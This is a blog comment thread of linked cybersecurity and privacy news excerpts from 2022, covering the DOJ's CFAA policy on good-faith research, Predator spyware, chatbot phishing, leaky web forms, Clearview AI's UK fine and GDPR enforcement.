In a policy shift, the US Department of Justice plans to stop prosecuting good-faith security research that would have violated the Computer Fraud and Abuse Act — The new policy addresses decades of uncertainty around the law and security research. — Joseph Cox
DOJ Announces It Won’t Prosecute White Hat Security Researchers
The new policy addresses decades of uncertainty around the law and security research.
https://www.vice.com/en/article/v7d9nb/department-of-justice-security-researchers-new-cfaa-policy
On Thursday the Department of Justice announced a policy shift in that it will no longer prosecute good-faith security research that would have violated the country’s federal hacking law the Computer Fraud and Abuse Act (CFAA).
The move is significant in that the CFAA has often posed a threat to security researchers who may probe or hack systems in an effort to identify vulnerabilities so they can be fixed. The revision of the policy means that such research should not face charges.
“Computer security research is a key driver of improved cybersecurity,” Deputy Attorney General Lisa O. Monaco said in a statement published with the announcement. “The department has never been interested in prosecuting good-faith computer security research as a crime, and today’s announcement promotes cybersecurity by providing clarity for good-faith security researchers who root out vulnerabilities for the common good.”
For decades experts have criticized the broad nature of the CFAA. The Electronic Frontier Foundation, an activist organization, previously said that “Security research is important to keep all computer users safe. If we do not know about security vulnerabilities, we cannot fix them, and we cannot make better computer systems in the future. The CFAA should protect white-hat hackers and give them incentives to continue their important work.”
Andrew Crocker, a senior staff attorney on the EFF’s civil liberties team told Motherboard in a statement “We’re pleased to see the Department of Justice recognize the contribution that security research plays in strengthening the security of the entire Internet, everything from messaging and social media applications to financial systems to critical infrastructure. Too often, the specter of the CFAA—with its ill-defined focus on ‘unauthorized access’—deters researchers from discovering and disclosing vulnerabilities in these systems.”
He said that the new policy does not go far enough. “By exempting research conducted ‘solely’ in ‘good faith,’ the policy calls into question work that serves both security goals and other motives, such as a researcher’s desire to be compensated or recognized for their contribution. As an agency policy, it does not bind courts and can be rescinded at any time such as by a future administration. And it does nothing to lessen the risk of frivolous or overbroad CFAA civil litigation against security researchers, journalists, and innovators. The policy is a good start, but it is no substitute for comprehensive CFAA reform.”
The announcement provided an example of the sort of ‘research’ that would be considered bad faith and could still face charges. “Discovering vulnerabilities in devices in order to extort their owners, even if claimed as ‘research,’ is not in good faith,” it reads.
The new policy comes into effect immediately and all federal prosecutors who wish to charge cases under the CFAA are required to follow the policy, the announcement adds.
Tomi Engdahl says:
Wall Street Journal:
Analysis: insurers significantly raised cyber coverage premiums in 2021, after high profile hacks; direct-written premiums by the largest insurers rose 92% YoY
Cyber Insurers Raise Rates Amid a Surge in Costly Hacks
Insurance market resets after a ransomware boom and the threat of spillover from Ukraine
https://www.wsj.com/articles/cyber-insurers-raise-rates-amid-a-surge-in-costly-hacks-11652866200?mod=djemalertNEWS
Tomi Engdahl says:
Orbitaldump – a simple multi-threaded distributed SSH brute-forcing tool written in Python
https://hakin9.org/orbitaldump-a-simple-multi-threaded-distributed-ssh-brute-forcing-tool-written-in-python/
How it Works
When the script is executed without the –proxies switch, it acts just like any other multi-threaded SSH brute-forcing scripts. When the –proxies switch is added, the script pulls a list (usually thousands) of SOCKS4 proxies from ProxyScrape and launch all brute-force attacks over the SOCKS4 proxies so brute-force attempts will be less likely to be rate-limited by the target host.
Tomi Engdahl says:
https://hackersonlineclub.com/address-resolution-protocol-arp-spoofing/
Tomi Engdahl says:
Vulnerabilities found in Bluetooth Low Energy gives hackers access to numerous devices
https://www.techrepublic.com/article/vulnerabilities-found-in-bluetooth-low-energy-gives-hackers-access-to-numerous-devices/
Tomi Engdahl says:
Your life online:
How is the EU making it easier and safer for you?
https://www.consilium.europa.eu/en/your-online-life-and-the-eu/?utm_source=facebook.com&utm_medium=cpc&utm_campaign=20220513-your-life-online-feature-story&utm_content=card
Tomi Engdahl says:
Kyberturvallisuus on syytä ottaa maatiloillakin vakavasti
https://www.lahitapiola.fi/tietoa-lahitapiolasta/uutishuone/uutiset-ja-tiedotteet/uutiset/uutinen/1509566989561
Tomi Engdahl says:
Some top 100,000 websites collect everything you type—before you hit submit
A number of websites include keyloggers that covertly snag your keyboard inputs.
https://www.wired.com/story/leaky-forms-keyloggers-meta-tiktok-pixel-study/
Tomi Engdahl says:
Lily Hay Newman / Wired:
Google details three campaigns that used Predator spyware, developed by North Macedonian company Cytrox and exploited five Android vulnerabilities found in 2021 — New research from Google’s Threat Analysis Group outlines the risks Android users face from the surveillance-for-hire industry.
Spyware Vendors Target Android With Zero-Day Exploits
https://www.wired.com/story/android-spyware-cytrox-predator-google-tag/
New research from Google’s Threat Analysis Group outlines the risks Android users face from the surveillance-for-hire industry.
NSO Group and its powerful Pegasus malware have dominated the debate over commercial spyware vendors who sell their hacking tools to governments, but researchers and tech companies are increasingly sounding the alarm about activity in the wider surveillance-for-hire industry. As part of this effort, Google’s Threat Analysis Group is publishing details on Thursday of three campaigns that used the popular Predator spyware, developed by the North Macedonian firm Cytrox, to target Android users.
In line with findings on Cytrox published in December by researchers at University of Toronto’s Citizen Lab, TAG saw evidence that state-sponsored actors who bought the Android exploits were located in Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain, and Indonesia. And there may have been other customers. The hacking tools took advantage of five previously unknown Android vulnerabilities, as well as known flaws that had fixes available but that victims hadn’t patched.
“It’s important to shine some light on the surveillance vendor ecosystem and how these exploits are being sold,” says Google TAG director Shane Huntley. “We want to reduce the ability of both the vendors and the governments and other actors who buy their products to throw around these dangerous zero-days without any cost. If there’s no regulation and no downside to using these capabilities, then you’ll see it more and more.”
TAG says it currently tracks more than 30 surveillance-for-hire vendors that have ranging levels of public presence and offer an array of exploits and surveillance tools. In the three Predator campaigns TAG examined, attackers sent Android users one-time links over email that looked like they had been shortened with a standard URL shortener. The attacks were targeted, focusing on just a few dozen potential victims. If a target clicked on the malicious link, it took them to a malicious page that automatically began deploying the exploits before quickly redirecting them to a legitimate website. On that malicious page, attackers deployed “Alien,” Android malware designed to load Cytrox’s full spyware tool, Predator.
As is the case with iOS, such attacks on Android require exploiting a series of operating system vulnerabilities in sequence. By deploying fixes, operating system makers can break these attack chains, sending spyware vendors back to the drawing board to develop new or modified exploits.
Tomi Engdahl says:
Pelottavan aito verkkohuijaus tyhjentää lompakoita keskustelitko vahingossa rikollisen kanssa?
https://www.tivi.fi/uutiset/tv/6dedaa5b-1093-4049-b3f5-390ca8376c0c
Taitavasti toteutetussa tietojenkalastelussa käytetään kaksivaiheista tunnistusta ja aidontuntuisia varmistuksia. Uudenlaisissa kalasteluhyökkäyksissä käytetään automaattisia chat-botteja, jotka ohjaavat pahaa-aavistamattomia käyttäjiä luovuttamaan tietonsa verkkorikollisille. Bottien käyttäminen luo uhrille kuvan tilanteen aitoudesta, sillä samanlaisia asiakaspalvelubotteja on useilla tunnetuilla verkkosivuilla.
Phishing websites now use chatbots to steal your credentials
https://www.bleepingcomputer.com/news/security/phishing-websites-now-use-chatbots-to-steal-your-credentials/
Phishing attacks are now using automated chatbots to guide visitors through the process of handing over their login credentials to threat actors.
This approach automates the process for attackers and gives a sense of legitimacy to visitors of the malicious sites, as chatbots are commonly found on websites for legitimate brands.
This new development in phishing attacks was discovered by researchers at Trustwave, who shared the report with Bleeping Computer before publication.
Tomi Engdahl says:
Deepfake attacks can easily trick live facial recognition systems online https://www.theregister.com/2022/05/22/ai_in_brief/
Miscreants can easily steal someone else’s identity by tricking live facial recognition software using deepfakes, according to a new report. So-called “liveness tests” try to authenticate identities in real-time, relying on images or video streams from cameras like face recognition used to unlock mobile phones, for example. Nine out of ten vendors failed Sensity’s live deepfake attacks.
Tomi Engdahl says:
Clearview AI illegally harvested data to create a database filled with more than 20 billion images it sells to organizations and law enforcement agencies, the U.K.’s privacy watchdog said.
Clearview AI Fined $9.4 Million In U.K. For Illegal Facial Recognition Database
https://www.forbes.com/sites/roberthart/2022/05/23/clearview-ai-fined-94-million-in-uk-for-illegal-facial-recognition-database/?utm_campaign=forbes&utm_source=facebook&utm_medium=social&utm_term=Gordie&sh=204288011963
Tomi Engdahl says:
Don’t make random HTTP requests.
https://www.youtube.com/watch?v=RCJdPiogUIk
In this episode we’ll explore the world of SSRFs.
If you are searching for “A New Era of SSRF – Exploiting URL Parser in Trending Programming Languages!”
https://www.youtube.com/watch?v=voTHFdL9S2k
Tomi Engdahl says:
IP and cybersecurity disputes are top legal concerns for tech companies
https://techcrunch.com/2022/05/23/ip-and-cybersecurity-disputes-are-top-legal-concerns-for-tech-companies/?tpcc=tcplusfacebook
No industry is a stranger to litigation, but for the tech sector, it appears intellectual property (IP) and patent disputes, followed by cybersecurity and data protection issues, are among the top legal matters that keep tech company managers up at night.
Startup teams, legal counsel and other internal stakeholders looking to address these legal challenges should consider three key factors impacting the sector.
IP disputes: The top litigation concern facing the sector
Technology respondents were more likely to be concerned about IP disputes than any other potential dispute source, with 46% listing them among the most concerning, compared to 16% across all industries.
The costs associated with these disputes, particularly when defending against accusations of patent infringement, were top of mind for respondents. Defending against IP disputes can be a drain on resources, particularly given the continued cost and prevalence of disputes initiated by “patent trolls” — entities whose primary business is to obtain and enforce patents against technology companies — far exceed the costs associated with leveraging the patent to provide goods and services.
Many respondents reportedly are expanding their legal teams.
Tech firms feel exposed to cybersecurity, data protection disputes
Technology respondents listed cybersecurity and data protection issues as the top concerning dispute trend, more than any other industry — 71% reported they felt more exposed to cyber security/data protection disputes, compared to the previous 12 months. They said protecting both their own proprietary information and their customer’s information was critical, particularly in an increasingly global market.
Tomi Engdahl says:
Näin sairaalat varautuvat kyberiskuihin “Asian merkitys on tunnistettu ja tunnustettu”
https://www.tivi.fi/uutiset/tv/9f93d63c-3df8-4127-8649-dea135cb5af4
Kyberuhkiin, kuten palvelunestohyökkäyksiin, kiristysohjelmiin ja tietoverkkoiskuihin varautuminen on hyvällä tasolla, Suomen yliopistollisista sairaaloista vakuutetaan.
Tomi Engdahl says:
Hackers can hack your online accounts before you even register them https://www.bleepingcomputer.com/news/security/hackers-can-hack-your-online-accounts-before-you-even-register-them/
Security researchers have revealed that hackers can hijack your online accounts before you even register them by exploiting flaws that have been already been fixed on popular websites, including Instagram, LinkedIn, Zoom, WordPress, and Dropbox. Andrew Paverd, a researcher at Microsoft Security Response Center, and Avinash Sudhodanan, an independent security researcher, analyzed 75 popular online services and found that at least 35 are vulnerable to account pre-hijacking attacks. Some notable examples of vulnerable platforms are Dropbox (UEC), Instagram (TID), LinkedIn (US), WordPress.com (US and UEC), and Zoom (CFM and NV).
Tomi Engdahl says:
How GDPR Is Failing
https://www.wired.com/story/gdpr-2022/
Since the General Data Protection Regulation went into effect, data regulators tasked with enforcing the law have struggled to act quickly on complaints against Big Tech firms and the murky online advertising industry, with scores of cases still outstanding. While GDPR has immeasurably improved the privacy rights of millions inside and outside of Europe, it hasn’t stamped out the worst problems: Data brokers are still stockpiling your information and selling it, and the online advertising industry remains littered with potential abuses.
Tomi Engdahl says:
FBI Wiretap Opens Window To Murderous Drug Gang And A Crucial Flaw In Snapchat Privacy
https://www.forbes.com/sites/thomasbrewster/2022/05/23/fbi-snapchat-surveillance-exposes-a-murderous-mexican-gang-and-snaps-weakness/?sh=712b35067aa7
Included in a search warrant unsealed earlier this year, the Snapchat surveillance operation offers a rare insight into how police can intercept conversations over social media apps almost instantaneously rather than wait for days, weeks or months to get similar data from the relevant tech giant. Forbes recently obtained a presentation by surveillance provider PenLink, in which such near-real-time wiretaps on the likes of Snapchat, Facebook and other apps were detailed. The PenLink presenter told police attendees that Snapchat, typically, could provide police with updates on user communications up to four times a day, though in some cases it may be more frequent.
Tomi Engdahl says:
Defending the Healthcare Security Landscape in the Age of Connected Devices
https://www.securityweek.com/defending-healthcare-security-landscape-age-connected-devices
Tomi Engdahl says:
Some top 100,000 websites collect everything you type—before you hit submit | Ars Technica
https://www.wired.com/story/leaky-forms-keyloggers-meta-tiktok-pixel-study/
A surprising number of the top 100,000 websites effectively include keyloggers that covertly snag everything you type into a form.
When you sign up for a newsletter, make a hotel reservation, or check out online, you probably take for granted that if you mistype your email address three times or change your mind and X out of the page, it doesn’t matter. Nothing actually happens until you hit the Submit button, right? Well, maybe not. As with so many assumptions about the web, this isn’t always the case, according to new research: A surprising number of websites are collecting some or all of your data as you type it into a digital form.
Researchers from KU Leuven, Radboud University, and University of Lausanne crawled and analyzed the top 100,000 websites, looking at scenarios in which a user is visiting a site while in the European Union and visiting a site from the United States. They found that 1,844 websites gathered an EU user’s email address without their consent, and a staggering 2,950 logged a US user’s email in some form. Many of the sites seemingly do not intend to conduct the data-logging but incorporate third-party marketing and analytics services that cause the behavior.
After specifically crawling sites for password leaks in May 2021, the researchers also found 52 websites in which third parties, including the Russian tech giant Yandex, were incidentally collecting password data before submission. The group disclosed their findings to these sites, and all 52 instances heve since been resolved.
“If there’s a Submit button on a form, the reasonable expectation is that it does something—that it will submit your data when you click it,” says Güneş Acar, a professor and researcher in Radboud University’s digital security group and one of the leaders of the study. “We were super surprised by these results. We thought maybe we were going to find a few hundred websites where your email is collected before you submit, but this exceeded our expectations by far.”
The researchers, who will present their findings at the Usenix security conference in August, say they were inspired to investigate what they call “leaky forms” by media reports, particularly from Gizmodo, about third parties collecting form data regardless of submission status. They point out that, at its core, the behavior is similar to so-called key loggers, which are typically malicious programs that log everything a target types.
Tomi Engdahl says:
DC Sues Zuckerberg Over Cambridge Analytica Privacy Breach
https://www.securityweek.com/dc-sues-zuckerberg-over-cambridge-analytica-privacy-breach
Tomi Engdahl says:
Facial Recognition Firm Clearview AI Fined $9.4 Million by UK Regulator
https://www.securityweek.com/facial-recognition-firm-clearview-ai-fined-94-million-uk-regulator
ICO orders Clearview AI to delete all UK data
The UK Information Commissioner’s Office (ICO) has fined facial recognition database firm Clearview AI more than £7.5 million (around $9.4 million) for breaching the UK GDPR. The ICO has also ordered Clearview to stop scraping and using the personal data of UK residents, and to delete the data of UK residents from its systems.
Clearview has scraped more than 20 billion images of faces and data available on the internet. Its service then allows customers – including the police – to upload an image to the Clearview app which matches it to images in the database. Close matches and a link to the source of the matches are returned to the customer.
Clearview no longer offers its services in the UK. However, the ICO believes its database will inevitably include images of UK residents, and these details are made available to users outside of the UK.
Announcing the fine and enforcement notice, John Edwards, UK Information Commissioner, said, “Clearview AI Inc has collected multiple images of people all over the world, including in the UK, from a variety of websites and social media platforms, creating a database with more than 20 billion images. The company not only enables identification of those people, but effectively monitors their behavior and offers it as a commercial service. That is unacceptable. That is why we have acted to protect people in the UK by both fining the company and issuing an enforcement notice.”
Tomi Engdahl says:
IBM Dives Into TrickBot Gang’s Malware Crypting Operation
https://www.securityweek.com/ibm-dives-trickbot-gangs-malware-crypting-operation
Tomi Engdahl says:
AWS Security Logging Best Practices: Real-Time Alerts and Detection-as-Code
https://panther.com/resources/webinars/aws-security-logging-best-practices-real-time-alerts-and-detection-as-code/?utm_source=security+week&utm_medium=sponsored&utm_content=webinar
For organizations tasked with securing rapidly growing AWS environments, one of the most challenging issues faced is collecting and normalizing AWS infrastructure logs like CloudTrail and VPC to identify suspicious activity. There’s a wealth of security-relevant information in these logs, but AWS logs are “noisy” and often voluminous, and teams need a robust security architecture to process this data that optimizes for speed, scale, and flexibility.
With Panther, disparate security logs from multiple AWS accounts and services can be collected and normalized in a single view for easier and faster threat detection and investigation. Panther’s data pipeline is built on the idea of “Streaming ETL (Extract, Transform, and Load)” where security data is parsed, normalized, and analyzed in real-time to identify suspicious activity as soon as it happens.
Two former AWS and Amazon Engineers Russell Leighton and Kostas Papageorgiou discuss AWS security logging best practices with Former Gartner Analyst, Brad LaPorte along with how to:
Centralize AWS logs for threat detection and investigation
Transform high-volume AWS data into a structured and scalable security data lake
Achieve real-time alerts with detection-as-code
Triage alerts faster by correlating activity across your AWS environment
Tomi Engdahl says:
US Senate: Govt’s ransomware fight hindered by limited reporting https://www.bleepingcomputer.com/news/security/us-senate-govt-s-ransomware-fight-hindered-by-limited-reporting/
A report published today by U.S. Senator Gary Peters, Chairman of the Senate Homeland Security and Governmental Affairs Committee, says law enforcement and regulatory agencies lack insight into ransomware attacks to fight against them effectively. While ransomware incidents have been increasingly hitting organizations across the country, there’s still room to improve reporting of both attacks and ransom payments which would provide the federal government with the data and information it needs to deter this severe threat to national security, Senator Peters added.
Tomi Engdahl says:
Interpol-pomo ennustaa uuden uhkan verkossa: ”Parin vuoden sisällä…” https://www.is.fi/digitoday/tietoturva/art-2000008841358.html
Tomi Engdahl says:
Interpol-pomo ennustaa uuden uhkan verkossa: ”Parin vuoden sisällä…” https://www.is.fi/digitoday/tietoturva/art-2000008841358.html
Samoin kuin tavanomaiset aseet, myös kyberaseet voivat päätyä vääriin käsiin.
Interpolin pääsihteeri Jürgen Stock varoittaa valtiollisten kyberaseiden päätymisestä jakeluun pimeässä verkossa ”parin vuoden sisällä”. Tämä tarkoittaisi myös niiden joutumista kyberrikollisten käsiin ja käyttöön, kirjoittaa NBC.
Military-Made Cyberweapons Could Soon Become Available on the Dark Web, Interpol Warns
https://www.nbcwashington.com/news/business/money-report/military-made-cyberweapons-could-soon-become-available-on-the-dark-web-interpol-warns/3059122/
Interpol Secretary General Jurgen Stock said he’s concerned state-developed cyberweapons will become available on the darknet in a “couple of years.”
The topic of cyberwar has long been a concern for global governments, but it’s gotten renewed attention amid the Russia-Ukraine war.
The number of cyberattacks more than doubled globally in 2021, according to the World Economic Forum’s Global Cybersecurity Outlook report.
Tomi Engdahl says:
8 erilaista kyberiskua – näin Suomea vastaan voidaan hyökätä
Ukrainassa on näyttäytynyt kyberiskujen koko kirjo.
https://www.is.fi/digitoday/tietoturva/art-2000008819316.html
Tomi Engdahl says:
Two Cybersecurity Companies Offering Free Risk Assessments
https://www.securityweek.com/two-cybersecurity-companies-offering-free-risk-assessments
Endpoint security company Tanium and risk management solutions provider Reciprocity have each announced free risk assessment offerings this week.
Tanium is offering what it describes as a comprehensive five-day risk assessment that leverages the company’s platform, a cloud-based delivery model, and Python-based script automation.
A risk score is calculated based on data collected about system vulnerabilities, administrative access, compliance, sensitive data identification, encryption and authentication, the risk of lateral movement, and insecure transport security protocols.
Companies that conduct the risk assessment are provided a comprehensive report that includes recommendations on remediation and implementation.
Tanium says CISOs and CIOs can use the assessment to better communicate with business leaders and the board when it comes to risk posture and the steps being taken to improve it.
Reciprocity announced a new community edition of its automated risk observation, assessment, and remediation (ROAR) platform.
Reciprocity Community Edition is a free version of the company’s ROAR platform that includes the ZenComply compliance and audit management solution and the ZenRisk risk management solution.
The platform is fully functional, but it does have limitations — it’s only designed to help organizations achieve SOC 2 compliance.
https://reciprocity.com/community-edition-signup/
Tomi Engdahl says:
WhiteSource Becomes Mend, Adds Automatic Code Remediation
https://www.securityweek.com/whitesource-becomes-mend-adds-automatic-code-remediation
An application code security firm has expanded its repertoire and changed its name to better reflect its new capabilities. WhiteSource has become Mend with the addition of automated code remediation to the newly named Mend Application Security Platform.
WhiteSource, now known as Mend, has been best known for its work on securing the open source software (OSS) supply chain. In February 2022 it reported that it had found 1,300 malicious JavaScript packages in the npm registry. In recent months it has developed a static application security testing (SAST) capability to complement its existing software composition analysis (SCA) open source functionality. It can now check in-house developed code as well as imported OSS.
The remediation works by scanning the code for common weaknesses (the CWE is a list of software weakness types, the presence of which could lead to a vulnerability in the code). “We look at the code after it’s been committed,” explained Sass. “If we find a vulnerability, we can open what’s called a pull request for the developer with a suggested fix. The few lines of code that we synthetically generate to fix the vulnerability for the developer would appear as a pull request for the developer waiting for his review inside the repository.”
Tomi Engdahl says:
Tapping Neurodiverse Candidates Can Address Cybersecurity Skills Shortage
https://www.securityweek.com/tapping-neurodiverse-candidates-can-address-cybersecurity-skills-shortage
While neurodiverse candidates don’t fit the traditional mold of applicants, they can often excel at highly focused, analytical work
At a time when there countless unfulfilled cybersecurity positions worldwide, too many companies overlook neurodiverse candidates in their hiring processes. This a huge mistake as people with autism, dyslexia, and other conditions often possess skills that are well suited for cybersecurity work. Those skills include the ability to concentrate, a capacity for recognizing anomalies, and great determination.
People with ADHD, for example, are able to hyper-focus on certain tasks, while those with autism can process complex detail-oriented tasks, and have above average recall capabilities.
However, neurodiverse people generally do not excel at acquiring certifications — common requirements for most cybersecurity jobs. Presenting a polished persona in an interview is something else they may struggle with.
In addition, interviewing neurodiverse candidates can be challenging since they tend to avoid eye contact, sometimes struggle to communicate and can get overwhelmed in unfamiliar circumstances. They may also struggle to communicate with groups of people in a panel type interview. All of these typically are seen as they “interviewed badly.”
If the cybersecurity industry wants to fill much-needed jobs, hiring managers and recruiters need to cast their nets beyond the sea of candidates who typify “fitting the mold.” The industry must pay attention to the hands-on abilities and innate skills of all applicants including neurodiverse candidates.
Tomi Engdahl says:
Drew Harwell / Washington Post:
Human Rights Watch finds 89% of 164 remote learning apps and sites used during the pandemic in 49 countries shared student data with marketers and data brokers — The educational tools used by students during the pandemic shared their information with advertisers and data brokers that could track …
https://www.washingtonpost.com/technology/2022/05/24/remote-school-app-tracking-privacy/
Tomi Engdahl says:
10 of the Most In-Demand IT Jobs — and Why
https://www.skillsoft.com/blog/10-of-the-most-in-demand-it-jobs-and-why?utm_source=security+week&utm_medium=display&utm_campaign=SKL+IT-SW-NA+FY23-ALL-PM-BLG-10+Most+in+demand+IT+jobs&utm_content=SKSTDMostDemandedJobs
While demand for skilled talent isn’t a new issue in IT, due to the Great Resignation competition has intensified for roles in cybersecurity, cloud, data science, and other areas.
It’s left tech leaders struggling to hire the workers they need. Nearly 40% of IT decision-makers have three or more unfilled roles on their teams.
“Conventional IT companies are no longer the only ones looking for IT workers, as more companies look to drive efficiency and scale to their business,” said Nev Ross, VP of Software Engineering at Skillsoft. “This has added an additional challenge to filling IT roles, which can delay project deliverables, affect company growth and customer satisfaction. Having open roles can be very costly to an organization in many ways.”
While competition for skilled workers remains high, another challenge continues to worsen at the same time: skills gaps. While most IT teams have skills gaps, what’s really staggering is how they impact the organization.
According to a joint IDG-Skillsoft survey, 89% of IT leaders see losses in revenue due to skills shortages, 76% see business go to the competition, and 72% see declines in customer satisfaction.
The 10 Most Challenging Areas of Tech to Hire For, According to IT Leaders
In a survey of more than 9,300 IT professionals worldwide, we reported in our IT Skills and Salary Report that the top 10 most challenging areas to hire for are these:
Cybersecurity
Cloud Computing
Analytics and Big Data
AI and Machine Learning
Systems and Solutions Architects
DevOps
Leadership and Management
Networking and Wireless
Data Policy and Governance
Project Management
For the past several years, cybersecurity has risen to the top of the list. Roles in this area remain among the most highly coveted and for good reason. According to IBM’s annual report on the topic, the average cost of a data breach is the highest it’s ever been at $4.24 million. Organizations continue to prioritize these roles because of the critical nature of security.
But, again, talent scarcity challenges IT leaders with team vacancies. Cyber Seek, an initiative to gather data on the cybersecurity job market, shows there are 597,000 open cybersecurity jobs in the U.S.
Tomi Engdahl says:
Security for the Atomized Network
A White Paper
https://content.netography.com/atomized-network-security-white-paper?utm_source=SecurityWeek&utm_medium=Banner&utm_campaign=AtomizedNetworkWhitePaper
We are facing an entirely different model of networking and computing, where applications and data are scattered across a complex environment consisting of multi-cloud, on-premise, and legacy infrastructure, being accessed by increasingly mobile and remote workers.
We call this the Atomized Network and it is increasingly difficult to secure.
In this white paper, we closely examine the Atomized Network, why it is difficult to defend, the limitations of the most prevalent solutions, and the new paradigm needed to secure it.
Tomi Engdahl says:
Washington Post:
Young gunmen are using private and disappearing messages in apps like Snapchat, Instagram, Discord, and Yubo to share violent plans, evading content moderation
https://www.washingtonpost.com/technology/2022/05/26/shooters-social-media/
Tomi Engdahl says:
Charlotte Klein / Vanity Fair:
Some US journalists question whether showing more graphic footage would force the public and political leaders to fully confront America’s gun violence epidemic
“We Cannot Sanitize These Killings”: News Media Considers Breaking Grimly Routine Coverage of Mass Shootings
https://www.vanityfair.com/news/2022/05/news-media-considers-breaking-grimly-routine-coverage-of-mass-shootings
Tomi Engdahl says:
Villi länsi loppuu: EU rajoittaa kasvojentunnistusta https://www.is.fi/digitoday/tietoturva/art-2000008842601.html
Kasvojentunnistusta pannaan aisoihin Euroopan unionissa, Tietosuojavaltuutetun toimisto tiedottaa. Euroopan tietosuojaneuvosto antoi uuden ohjeen, joka koskee kasvojentunnistusteknologian käyttöä lainvalvonnan alalla.
Tomi Engdahl says:
Four Takeaways as the European Union’s General Data Protection Regulation (GDPR) Turns 4 https://www.crowdstrike.com/blog/four-takeaways-as-gdpr-turns-4/
May 25, 2022, marked four years since the European Union’s General Data Protection Regulation (GDPR) went into effect. Although the scope of the law is limited to personal data originating from activities in the European Economic Area, the ensuing requirements have had a global impact. This is evident in similar laws that have been proposed or passed and measures multinational organizations have taken to comply with privacy requirements. In parallel, there has been a convergence of a principles-based approach to cybersecurity in many jurisdictions worldwide. In light of the trends of the past four years, there are four clear takeaways for organizations seeking to meet their GDPR obligations.
Tomi Engdahl says:
WhatsApp työstää hämmentävää uudistusta: Katoavat viestit voikin pitää https://www.is.fi/digitoday/mobiili/art-2000008845554.html
METAN eli entisen Facebookin omistama WhatsApp-pikaviestin suunnittelee muutosta katoaviin viesteihin. Palvelu esitteli itsestään tuhoutuvat viestit vuonna 2020 lisätäkseen käyttäjien yksityisyyttä, mutta nyt kaavailtu toiminto mahdollistaisi tiettyjen viestien säilyttämisen, sovelluksen kehitystä seuraava WABetaInfo kirjoittaa.
Uutispalvelun mukaan toiminto antaa viestin lähettäjän pitää näkyvänä alun perin katoavana lähetetty viesti. WhatsAppin työpöytäsovelluksen testiversiosta löytyi osio, jonka nimi on Kept Messages. Täältä löytyvät jatkossa sellaiset katoavat viestit, jotka käyttäjä on päättänyt säilyttää.
Tomi Engdahl says:
Remote learning apps shared children’s data at a dizzying scale’
https://www.msn.com/en-us/news/technology/remote-learning-apps-shared-children-e2-80-99s-data-at-a-e2-80-98dizzying-scale-e2-80-99/ar-AAXGt4T
Millions of children had their online behaviors and personal information tracked by the apps and websites they used for school during the pandemic, according to an international investigation that raises concerns about the impact remote learning had on children’s privacy online. The educational tools were recommended by school districts and offered interactive math and reading lessons to children as young as prekindergarten. But many of them also collected students’
information and shared it with marketers and data brokers, who could then build data profiles used to target the children with ads that follow them around the Web.
Tomi Engdahl says:
Mobile trojan detections rise as malware distribution level declines https://www.bleepingcomputer.com/news/security/mobile-trojan-detections-rise-as-malware-distribution-level-declines/
Kaspersky’s quarterly report on mobile malware distribution notes a downward trend that started in late 2020. Despite the overall demise in malware volumes, the security company reports a spike in trojan distribution, including generic trojans, banking trojans, and spyware.
This worrying development underlines an increasing focus on more sophisticated and damaging operations that gradually replace the low-yielding adware and “risk-tools”.